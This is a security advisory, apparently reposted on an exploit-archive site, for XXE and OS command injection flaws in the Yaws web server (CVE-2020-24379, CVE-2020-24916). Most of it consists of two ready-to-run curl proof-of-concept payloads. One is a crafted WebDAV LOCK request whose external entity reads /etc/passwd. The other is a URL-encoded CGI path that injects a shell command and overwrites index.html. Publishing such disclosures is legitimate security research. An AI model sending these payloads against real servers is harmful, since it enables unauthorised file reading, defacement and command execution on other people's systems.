Yaws 2.0.7 XML Injection / Command Injection

2020.09.10
Credit: Alexey Pronin
Risk: High
Local: No
Remote: Yes
CWE: CWE-78

# Exploit Title: Multiple vulnerabilities in Yaws web server # Date: 2020-08-10 # Exploit Author: Alexey Pronin (vulnbe) # Vendor Homepage: http://yaws.hyber.org/ # Software Link: https://github.com/erlyaws/yaws # Versions affected: 1.81 - 2.0.7 # CVE: CVE-2020-24379, CVE-2020-24916 1. Description: ---------------------- Yaws versions 1.81 to 2.0.7 are vulnerable to XXE and OS command injections. 2. XXE injection Proof of Concept (CVE-2020-24379) ---------------------- curl -i -s -k -X LOCK http://localhost:8000/ -H 'Timeout: Second-1' \ --data-binary @- << EOF <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY sp SYSTEM "file:///etc/passwd"> ]> <d:lockinfo xmlns:d="DAV:"> <d:lockscope><d:exclusive/></d:lockscope> <d:locktype><d:write/></d:locktype> <d:owner> <d:href><r>&sp;</r></d:href> </d:owner> </d:lockinfo> EOF 3. OS command injection Proof of Concept (CVE-2020-24916) ---------------------- curl 'http://127.0.0.1:8000/cgi-bin/%22%60export%20Z=$(pwd%7Ccut%20-c1);echo%20pawned%20completely%3E%3E..$Z%22%22index.html%60%22' 4. References ---------------------- * Vulnerability details: https://vuln.be/post/yaws-xxe-and-shell-injections/ * XXE injection PoC: https://github.com/vulnbe/poc-yaws-dav-xxe) * Shell injection PoC: https://github.com/vulnbe/poc-yaws-cgi-shell-injection


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top